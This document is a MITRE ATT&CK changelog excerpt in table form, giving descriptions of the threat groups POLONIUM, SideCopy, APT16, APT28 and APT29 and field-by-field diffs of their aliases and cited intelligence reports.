| [POLONIUM](https://attack.mitre.org/groups/G1005) is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess [POLONIUM](https://attack.mitre.org/groups/G1005) has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.(Citation: Microsoft POLONIUM June 2022) |
| Description |
|---|
| [SideCopy](https://attack.mitre.org/groups/G1008) is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghani government personnel, since at least 2019. [SideCopy](https://attack.mitre.org/groups/G1008)'s name comes from its infection chain that tries to mimic that of [Sidewinder](https://attack.mitre.org/groups/G0121), a suspected Indian threat group.(Citation: MalwareBytes SideCopy Dec 2021) |
| Description |
|---|
| [APT16](https://attack.mitre.org/groups/G0023) is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. (Citation: FireEye EPS Awakens Part 2) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-12 19:54:58.537000+00:00 | 2022-07-26 23:33:26.354000+00:00 |
| external_references[2]['description'] | Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016. | Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html | https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html |
| Description |
|---|
| [APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack', 'mobile-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 20:34:03.233000+00:00 | 2022-03-16 18:08:13.958000+00:00 |
| external_references[2]['source_name'] | SNAKEMACKEREL | IRON TWILIGHT |
| external_references[2]['description'] | (Citation: Accenture SNAKEMACKEREL Nov 2018) | (Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017) |
| external_references[3]['source_name'] | Swallowtail | SNAKEMACKEREL |
| external_references[3]['description'] | (Citation: Symantec APT28 Oct 2018) | (Citation: Accenture SNAKEMACKEREL Nov 2018) |
| external_references[4]['source_name'] | Group 74 | Swallowtail |
| external_references[4]['description'] | (Citation: Talos Seduploader Oct 2017) | (Citation: Symantec APT28 Oct 2018) |
| external_references[5]['source_name'] | Sednit | Group 74 |
| external_references[5]['description'] | This designation has been used in reporting both to refer to the threat group and its associated malware JHUHUGIT.(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018) | (Citation: Talos Seduploader Oct 2017) |
| external_references[6]['source_name'] | Sofacy | Sednit |
| external_references[6]['description'] | This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017) | This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018) |
| external_references[7]['source_name'] | Pawn Storm | Sofacy |
| external_references[7]['description'] | (Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) | This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017) |
| external_references[8]['source_name'] | Fancy Bear | Pawn Storm |
| external_references[8]['description'] | (Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) | (Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) |
| external_references[9]['source_name'] | STRONTIUM | Fancy Bear |
| external_references[9]['description'] | (Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) | (Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| external_references[10]['source_name'] | Tsar Team | STRONTIUM |
| external_references[10]['description'] | (Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017) | (Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| external_references[11]['source_name'] | Threat Group-4127 | Tsar Team |
| external_references[11]['description'] | (Citation: SecureWorks TG-4127) | (Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017) |
| external_references[12]['source_name'] | TG-4127 | Threat Group-4127 |
| external_references[13]['source_name'] | NSA/FBI Drovorub August 2020 | TG-4127 |
| external_references[13]['description'] | NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020. | (Citation: SecureWorks TG-4127) |
| external_references[14]['source_name'] | Cybersecurity Advisory GRU Brute Force Campaign July 2021 | NSA/FBI Drovorub August 2020 |
| external_references[14]['description'] | NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021. | NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020. |
| external_references[14]['url'] | https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF | https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF |
| external_references[15]['source_name'] | DOJ GRU Indictment Jul 2018 | Cybersecurity Advisory GRU Brute Force Campaign July 2021 |
| external_references[15]['description'] | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. | NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021. |
| external_references[15]['url'] | https://www.justice.gov/file/1080281/download | https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF |
| external_references[16]['source_name'] | Ars Technica GRU indictment Jul 2018 | DOJ GRU Indictment Jul 2018 |
| external_references[16]['description'] | Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018. | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. |
| external_references[16]['url'] | https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/ | https://www.justice.gov/file/1080281/download |
| external_references[17]['source_name'] | Crowdstrike DNC June 2016 | Ars Technica GRU indictment Jul 2018 |
| external_references[17]['description'] | Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016. | Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018. |
| external_references[17]['url'] | https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ | https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/ |
| external_references[18]['source_name'] | FireEye APT28 | Crowdstrike DNC June 2016 |
| external_references[18]['description'] | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. | Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016. |
| external_references[18]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf | https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ |
| external_references[19]['source_name'] | SecureWorks TG-4127 | FireEye APT28 |
| external_references[19]['description'] | SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016. | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. |
| external_references[19]['url'] | https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf |
| external_references[20]['source_name'] | FireEye APT28 January 2017 | SecureWorks TG-4127 |
| external_references[20]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016. |
| external_references[20]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign |
| external_references[21]['source_name'] | GRIZZLY STEPPE JAR | FireEye APT28 January 2017 |
| external_references[21]['description'] | Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. |
| external_references[21]['url'] | https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf |
| external_references[22]['source_name'] | Sofacy DealersChoice | GRIZZLY STEPPE JAR |
| external_references[22]['description'] | Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018. | Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017. |
| external_references[22]['url'] | https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/ | https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf |
| external_references[23]['source_name'] | Palo Alto Sofacy 06-2018 | Sofacy DealersChoice |
| external_references[23]['description'] | Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018. | Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018. |
| external_references[23]['url'] | https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/ | https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/ |
| external_references[24]['source_name'] | Symantec APT28 Oct 2018 | Palo Alto Sofacy 06-2018 |
| external_references[24]['description'] | Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018. | Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018. |
| external_references[24]['url'] | https://www.symantec.com/blogs/election-security/apt28-espionage-military-government | https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/ |
| external_references[25]['source_name'] | ESET Zebrocy May 2019 | Symantec APT28 Oct 2018 |
| external_references[25]['description'] | ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019. | Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018. |
| external_references[25]['url'] | https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/ | https://www.symantec.com/blogs/election-security/apt28-espionage-military-government |
| external_references[26]['source_name'] | US District Court Indictment GRU Oct 2018 | ESET Zebrocy May 2019 |
| external_references[26]['description'] | Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020. | ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019. |
| external_references[26]['url'] | https://www.justice.gov/opa/page/file/1098481/download | https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/ |
| external_references[27]['source_name'] | Kaspersky Sofacy | US District Court Indictment GRU Oct 2018 |
| external_references[27]['description'] | Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015. | Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020. |
| external_references[27]['url'] | https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/ | https://www.justice.gov/opa/page/file/1098481/download |
| external_references[28]['source_name'] | ESET Sednit Part 3 | Kaspersky Sofacy |
| external_references[28]['description'] | ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016. | Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015. |
| external_references[28]['url'] | http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf | https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/ |
| external_references[29]['source_name'] | Talos Seduploader Oct 2017 | ESET Sednit Part 3 |
| external_references[29]['description'] | Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018. | ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016. |
| external_references[29]['url'] | https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html | http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf |
| external_references[30]['source_name'] | Securelist Sofacy Feb 2018 | Talos Seduploader Oct 2017 |
| external_references[30]['description'] | Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018. | Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018. |
| external_references[30]['url'] | https://securelist.com/a-slice-of-2017-sofacy-activity/83930/ | https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html |
| external_references[31]['source_name'] | Accenture SNAKEMACKEREL Nov 2018 | Securelist Sofacy Feb 2018 |
| external_references[31]['description'] | Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019. | Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018. |
| external_references[31]['url'] | https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50 | https://securelist.com/a-slice-of-2017-sofacy-activity/83930/ |
| external_references[32]['source_name'] | TrendMicro Pawn Storm Dec 2020 | Secureworks IRON TWILIGHT Profile |
| external_references[32]['description'] | Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021. | Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022. |
| external_references[32]['url'] | https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html | https://www.secureworks.com/research/threat-profiles/iron-twilight |
| external_references[33]['source_name'] | Microsoft STRONTIUM Aug 2019 | Secureworks IRON TWILIGHT Active Measures March 2017 |
| external_references[33]['description'] | MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019. | Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022. |
| external_references[33]['url'] | https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/ | https://www.secureworks.com/research/iron-twilight-supports-active-measures |
| external_references[34]['source_name'] | Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020 | Accenture SNAKEMACKEREL Nov 2018 |
| external_references[34]['description'] | Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020. | Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019. |
| external_references[34]['url'] | https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/ | https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50 |
| x_mitre_version | 3.2 | 4.0 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | IRON TWILIGHT | |
| external_references | {'source_name': 'TrendMicro Pawn Storm Dec 2020', 'description': 'Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.', 'url': 'https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html'} | |
| external_references | {'source_name': 'Microsoft STRONTIUM Aug 2019', 'description': 'MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.', 'url': 'https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/'} | |
| external_references | {'source_name': 'Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020', 'description': 'Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.', 'url': 'https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/'} |
| Description |
|---|
| [APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021) In April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/ | |
| external_references | https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 00:59:58.792000+00:00 | 2022-07-11 20:34:55.717000+00:00 |
| external_references[1]['source_name'] | APT29 | CozyDuke |
| external_references[1]['description'] | (Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021) | (Citation: Crowdstrike DNC June 2016) |
| external_references[2]['source_name'] | NobleBaron | Cozy Bear |
| external_references[2]['description'] | (Citation: SentinelOne NobleBaron June 2021) | (Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: CrowdStrike StellarParticle January 2022) |
| external_references[3]['source_name'] | Dark Halo | StellarParticle |
| external_references[3]['description'] | (Citation: Volexity SolarWinds) | (Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: CrowdStrike StellarParticle January 2022) |
| external_references[4]['source_name'] | StellarParticle | The Dukes |
| external_references[4]['description'] | (Citation: CrowdStrike SUNSPOT Implant January 2021) | (Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021) |
| external_references[5]['source_name'] | NOBELIUM | APT29 |
| external_references[5]['description'] | (Citation: MSTIC NOBELIUM Mar 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: MSRC Nobelium June 2021) | (Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021) |
| external_references[8]['source_name'] | The Dukes | NOBELIUM |
| external_references[8]['description'] | (Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021) | (Citation: MSTIC NOBELIUM Mar 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: MSRC Nobelium June 2021) |
| external_references[9]['source_name'] | Cozy Bear | IRON HEMLOCK |
| external_references[9]['description'] | (Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021) | (Citation: Secureworks IRON HEMLOCK Profile) |
| external_references[10]['source_name'] | CozyDuke | IRON RITUAL |
| external_references[10]['description'] | (Citation: Crowdstrike DNC June 2016) | (Citation: Secureworks IRON RITUAL Profile) |
| external_references[11]['source_name'] | White House Imposing Costs RU Gov April 2021 | NobleBaron |
| external_references[11]['description'] | White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021. | (Citation: SentinelOne NobleBaron June 2021) |
| external_references[12]['source_name'] | UK Gov Malign RIS Activity April 2021 | Dark Halo |
| external_references[12]['description'] | UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021. | (Citation: Volexity SolarWinds) |
| external_references[13]['source_name'] | F-Secure The Dukes | Crowdstrike DNC June 2016 |
| external_references[13]['description'] | F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015. | Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016. |
| external_references[13]['url'] | https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf | https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ |
| external_references[14]['source_name'] | GRIZZLY STEPPE JAR | Volexity SolarWinds |
| external_references[14]['description'] | Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017. | Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020. |
| external_references[14]['url'] | https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf | https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ |
| external_references[15]['source_name'] | Crowdstrike DNC June 2016 | CrowdStrike SUNSPOT Implant January 2021 |
| external_references[15]['description'] | Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016. | CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021. |
| external_references[15]['url'] | https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ | https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/ |
| external_references[16]['source_name'] | UK Gov UK Exposes Russia SolarWinds April 2021 | CrowdStrike StellarParticle January 2022 |
| external_references[16]['description'] | UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021. | CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022. |
| external_references[16]['url'] | https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise | https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/ |
| external_references[17]['source_name'] | NSA Joint Advisory SVR SolarWinds April 2021 | GRIZZLY STEPPE JAR |
| external_references[17]['description'] | NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021. | Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017. |
| external_references[17]['url'] | https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF | https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf |
| external_references[18]['source_name'] | UK NSCS Russia SolarWinds April 2021 | FireEye APT29 Nov 2018 |
| external_references[18]['description'] | UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021. | Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018. |
| external_references[18]['url'] | https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise | https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html |
| external_references[19]['source_name'] | FireEye SUNBURST Backdoor December 2020 | F-Secure The Dukes |
